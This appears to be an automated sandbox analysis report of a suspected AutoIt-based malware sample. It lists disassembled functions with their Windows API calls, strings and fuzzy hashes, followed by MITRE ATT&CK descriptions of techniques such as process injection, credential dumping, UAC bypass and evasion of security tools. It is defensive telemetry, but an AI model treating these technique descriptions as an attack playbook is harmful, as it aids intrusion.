Function 0028CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0028CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0028CDA6

Strings

<local>, xrefs: 0028CD66

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d47f515d34048b3344f1c2047049ac95a8ad7ae117f8fefb2bf4128feb3c933e
Instruction ID: 07f9c7825bafc4e841f3cb60f3e98c71dc3f6337635bcb736988b7179ef52d44
Opcode Fuzzy Hash: d47f515d34048b3344f1c2047049ac95a8ad7ae117f8fefb2bf4128feb3c933e
Instruction Fuzzy Hash: 3B11A7751266327AD7286B668C49EE7BE5CEB127A4F204236B109831C0D7705861D7F0

Uniqueness

Uniqueness Score: -1.00%

Function 002A3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 002A34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002A34BA

Strings

edit, xrefs: 002A348F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: e8fe61d51ad981c00e44ce84b709bc31394d69d456c2ac8b227986f2a09ad162
Instruction ID: 29e8767cd0bd34433804724bce6002275e93bec5f12efff46ca11b0f5ef1b79d
Opcode Fuzzy Hash: e8fe61d51ad981c00e44ce84b709bc31394d69d456c2ac8b227986f2a09ad162
Instruction Fuzzy Hash: 5D119171520209AFEB11CE64EC44AFB376AEF1A774F604324F965971D0CB71DCA19B50

Uniqueness

Uniqueness Score: -1.00%

Function 00276C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

CharUpperBuffW.USER32(?,?), ref: 00276CB6
_wcslen.LIBCMT ref: 00276CC2

Strings

STOP, xrefs: 00276CBC, 00276CC1

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 4809b2d6766b8df8f1593c3f58db2df86958e97a04002d72ad2f5244cef82c1b
Instruction ID: 82f2ebb9a87cfd71c9f99bf2046d8a80390d76bcd1e33e82f302d00e022dd555
Opcode Fuzzy Hash: 4809b2d6766b8df8f1593c3f58db2df86958e97a04002d72ad2f5244cef82c1b
Instruction Fuzzy Hash: F50104326309278BCB21AFFDDC889BF33A4EA65710B104539E85696190EB31D960CA50

Uniqueness

Uniqueness Score: -1.00%

Function 0022A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0022A529

Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD

Strings

,%., xrefs: 0022A509
3y&, xrefs: 0022A545, 0022A54D, 0022A552

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%.$3y&
API String ID: 2551934079-2574036372
Opcode ID: d31d2c9882f7f5317de6a5a909dc560a486b2da4a5ae8130e051bb7357ee2f2e
Instruction ID: b5981f9280d3bb059b276d62751f74cc193f2ad0f1ca1e2f8899103f62e710dc
Opcode Fuzzy Hash: d31d2c9882f7f5317de6a5a909dc560a486b2da4a5ae8130e051bb7357ee2f2e
Instruction Fuzzy Hash: 5B012B32B70660A7C504F7A8F9ABA9E73A89B06720FD00025F9065B5C2DE509DB58ED7

Uniqueness

Uniqueness Score: -1.00%

Function 002A8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002E3018,002E305C), ref: 002A81BF
CloseHandle.KERNEL32 ref: 002A81D1

Strings

\0., xrefs: 002A818A

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0.
API String ID: 3712363035-2574726650
Opcode ID: 1eba2f4db613bc2efccf379f8b2330686bef87274970a2df07e04bf2e0ee13bb
Instruction ID: a70bafd2a686982634856406212d18bd49f8590b8b904243fdb2005015d7b22b
Opcode Fuzzy Hash: 1eba2f4db613bc2efccf379f8b2330686bef87274970a2df07e04bf2e0ee13bb
Instruction Fuzzy Hash: D6F054F1690340BBE720E761FC4DFB73A5CDB05752F000460BB08DA1A1DA758A1486B4

Uniqueness

Uniqueness Score: -1.00%

Function 0029747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00297493
_wcslen.LIBCMT ref: 002974B9

Strings

3, 3, 16, 1, xrefs: 00297483

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: a265634f4efd2ea47e0b3750de250e226ba8820302485d495857ca8d4418898b
Instruction ID: 43ac95061c1755017ec26ce0a497ed78ea21bf0572ed6e81f728c9c16007f18e
Opcode Fuzzy Hash: a265634f4efd2ea47e0b3750de250e226ba8820302485d495857ca8d4418898b
Instruction Fuzzy Hash: 39E0AB462342201083302239DCC1B7F4799CFC9760B10282BF880C2267EA888CB183A0

Uniqueness

Uniqueness Score: -1.00%

Function 00270B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00270B23

Strings

AutoIt, xrefs: 00270B17
Error allocating memory., xrefs: 00270B1C

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 22a71343ed9ac5fc03a969eb37c3e2a719b13b70fa3050597cf29a305cf2669a
Instruction ID: 6713823ae5891aa4af603039c28c2dee7702ca7c3c9bcea453602a9e21dbc45d
Opcode Fuzzy Hash: 22a71343ed9ac5fc03a969eb37c3e2a719b13b70fa3050597cf29a305cf2669a
Instruction Fuzzy Hash: 51E0D83126432837D21437947D07FC9BA848F06B20F200467F748555C38FE168B04AE9

Uniqueness

Uniqueness Score: -1.00%

Function 00230D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0022F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00230D71,?,?,?,0021100A), ref: 0022F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0021100A), ref: 00230D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0021100A), ref: 00230D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00230D7F

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 2b84931a86c0d2bf643ff7b6eba004f69637a9a134e2c05225e3a2bbed67dd2d
Instruction ID: 5006ee3ab72cb96fe0e868afa226845d275fccef98f07e01696125683ca942c3
Opcode Fuzzy Hash: 2b84931a86c0d2bf643ff7b6eba004f69637a9a134e2c05225e3a2bbed67dd2d
Instruction Fuzzy Hash: FBE06DB02103518BE3609FB8E698746BBF0EB05740F00496DE882C6655DBB4E4948BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0022E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0022E3D5

Strings

8%., xrefs: 0022E3CA
0%., xrefs: 0022E3B5

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%.$8%.
API String ID: 1385522511-764554917
Opcode ID: 3acd96835867d41815b38a2163ee6d8c84a9eb965d4b0295492a838fb2fae095
Instruction ID: f9b9ed2c95660304e8cec4d825218d3a000beea2eadda493d9e8aa2b5022d600
Opcode Fuzzy Hash: 3acd96835867d41815b38a2163ee6d8c84a9eb965d4b0295492a838fb2fae095
Instruction Fuzzy Hash: 9AE020314B0B74DBCE0CDB58B7E899C3359AB05321BD101E4F0034B1D5DBB018659A54

Uniqueness

Uniqueness Score: -1.00%

Function 0026D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0026D220

Strings

X64, xrefs: 0026D2A8
%.3d, xrefs: 0026D22B

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 83d78da49dcd8e8ed029355484adfb82e24f02ff2c7ad84341bcf9ab70d0c133
Instruction ID: c1ae8be1c40b5d1c916e888fd5e42a8f032e741803ab5c14d82c0644f81cfa1b
Opcode Fuzzy Hash: 83d78da49dcd8e8ed029355484adfb82e24f02ff2c7ad84341bcf9ab70d0c133
Instruction Fuzzy Hash: 2BD012B1D3811CFACB9096D0DC599B9B37CAB09301F608462FC0691041E7A8D5A86B61

Uniqueness

Uniqueness Score: -1.00%

Function 002A2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 002A232C
PostMessageW.USER32 ref: 002A233F

Part of subcall function 0027E97B: Sleep.KERNEL32 ref: 0027E9F3

Strings

Shell_TrayWnd, xrefs: 002A2325

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: e2aa9293dffdfc807abeca247c0e345c877380f4771d4bb584b91baa3fb67b48
Instruction ID: 00c339d531a2169e2cf376124d7306408241b75700762e7802a0423883af0e86
Opcode Fuzzy Hash: e2aa9293dffdfc807abeca247c0e345c877380f4771d4bb584b91baa3fb67b48
Instruction Fuzzy Hash: AFD022323E0300B7E668B730EC0FFC6BA089B02B00F1049027349AA1D0CCF0A800CE10

Uniqueness

Uniqueness Score: -1.00%

Function 002A2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 002A236C
PostMessageW.USER32 ref: 002A2373

Part of subcall function 0027E97B: Sleep.KERNEL32 ref: 0027E9F3

Strings

Shell_TrayWnd, xrefs: 002A2365

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5a76260697e5a9c19d8a621ded75206b817a1b2064daecfcd8dc57d0e9021da0
Instruction ID: d2af451661cf0b0389f17c839f9b5fb4887a773f5f62d3aab95d053cc61c51dd
Opcode Fuzzy Hash: 5a76260697e5a9c19d8a621ded75206b817a1b2064daecfcd8dc57d0e9021da0
Instruction Fuzzy Hash: 9ED0A9323D0300BBE668A730AC0FFC6A6089B06B00F1049027345AA1D0C8B0A8008A14

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

